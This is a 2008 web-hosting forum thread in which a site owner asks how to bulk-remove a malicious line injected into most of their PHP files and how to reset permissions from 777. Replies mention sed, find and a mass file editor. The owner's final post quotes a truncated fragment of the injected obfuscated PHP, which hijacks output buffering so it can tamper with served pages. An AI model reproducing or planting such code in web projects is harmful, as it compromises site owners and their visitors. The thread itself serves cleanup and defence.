What program can I use to bulk change php scripts affected by Hack?

Portal Home > Knowledgebase > Articles Database > What program can I use to bulk change php scripts affected by Hack?

Posted by gemasis, 09-15-2008, 07:43 AM
Hello, I have on the last line of most of my PHP files a hack line. I dont know how it got it (working on it) but I have downloaded the site and would like to remove the line from all of them then re-upload and chenge the permissions from 777 to 775 or 644. Any programme out there that can help? Regards
Posted by macooper, 09-15-2008, 08:08 AM
If you have shell access, you could use sed to do the edits with: where you would replace pattern with the text your looking for and replace with the replacement string. Note that you will probably need to put single quotes around the pattern and replace strings. You could then use find to change the permissions with:
Posted by gemasis, 09-15-2008, 10:28 AM
Hello, I am abit like a fish out of water with such coding. I have downloaded all the said files into 1 single folder on my desktop, so how would I do it from there? Your above example is for files still on the server correct? I can access it via Putty, is the shell access you speak of? and what if the replace I want to have is nothing...a blank..
Posted by heliopause, 09-15-2008, 10:43 AM
I've used Mass File Editor in the past. Works great. massfileeditor.com
Posted by gemasis, 09-15-2008, 11:24 AM
thank you, will try it now.....
Posted by Sheps, 09-15-2008, 12:54 PM
What hack line do you have in your PHP files?
Posted by macooper, 09-15-2008, 01:18 PM
Yes, those commands are direct on the server and yes, putty is shell access to the server. As an example, let's say they put this text in the file 'spam link ' you would use this to remove it :
Posted by gemasis, 09-15-2008, 01:36 PM
Hello This is the hackline: '))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i I know alot of sites have experienced this aswell. I just want to remove them and change my permissions. My provider has given me back ownership of the hijacked files so I need to correct them a.s.a.p. Macooper, please check your inbox, I sent a PM...thanx